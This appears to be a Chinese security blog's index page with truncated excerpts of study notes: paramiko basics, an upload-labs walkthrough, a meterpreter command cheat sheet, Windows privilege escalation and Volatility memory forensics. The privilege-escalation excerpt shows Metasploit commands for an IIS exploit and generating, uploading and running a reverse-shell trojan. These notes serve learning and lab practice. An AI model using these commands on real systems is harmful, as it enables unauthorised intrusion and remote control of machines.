paramiko模块介绍
# Paramiko 模块介绍
ssh 是一个协议,OpenSSH 是其中一个开源实现,paramiko 是 Python 的一个库,实现了 SSHv2 协议 (底层使用 cryptography)。
有了 Paramiko 以后,我们就可以在 Python 代码中直接使用 SSH 协议对远程服务器执行操作,而不是通过 ssh 命令对远程服务器进行操作。
由于 paramiko 属于第三方库,所以需要使用如下命令先行安装
1pip3 install paramiko
paramiko 包含两个核心组件:SSHClient 和 SFTPClient。
SSHClient 的作用类似于...
more...
upload-labs通关记录
# upload-labs 通关记录总计
# Pass-01 (前端绕过)
12三种方法:前端绕过,jpg改php,删除"return checkFile()"
题目源码
1234567891011121314151617function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "")...
more...
meterpreter学习笔记
# meterpreter 学习笔记总结
# 系统命令
123456789101112131415background # 将当前会话放置后台sessions # sessions –h 查看帮助sessions -i <ID 值> #进入会话 -k 杀死会话bgrun / run # 执行已有的模块,输入 run 后按两下 tab,列出已有的脚本info # 查看已有模块信息getuid # 查看当前用户身份getprivs # 查看当前用户具备的权限getpid # 获取当前进程 ID(PID)sysinfo # 查看目标机系统信息irb # 开启 ruby...
more...
Windows内核提权
# Windows 内核提权
Cve-2016-7269 低权限提权
第一种方法
利用模块进行渗透
123use exploit/windows/iis/cve-2017-7269set rhosts IPexploit
发现是 windows 低权限,限免进行提权
# 生成 exe 上传反弹木马
生成反弹木马
123msfpc windows 本地IP 3333mv windows-*.exe 1.exemsfconsole -r windows-*exe.rc
上传 1.exe 到 C:/1 / 下,进行反弹
1execute -f 1.exe
1利用run...
more...
内存取证
# 内存取证
# volatility 使用:
# 获取内存镜像的摘要信息
1volatility -f mem.raw imageinfo
判断系统版本应该是 Win7SP1x64
# 查看进程信息
pslist 可以直接列出运行的进程,如果进程已经结束,会在 Exit 列显示日期和时间,表明进程已经结束
1volatility -f mem.raw --profile=Win7SP1x64 pslist
# 查看隐藏进程
12volatility -f mem.raw --profile=Win7SP1x64 pstreevolatility -f mem.raw...
more...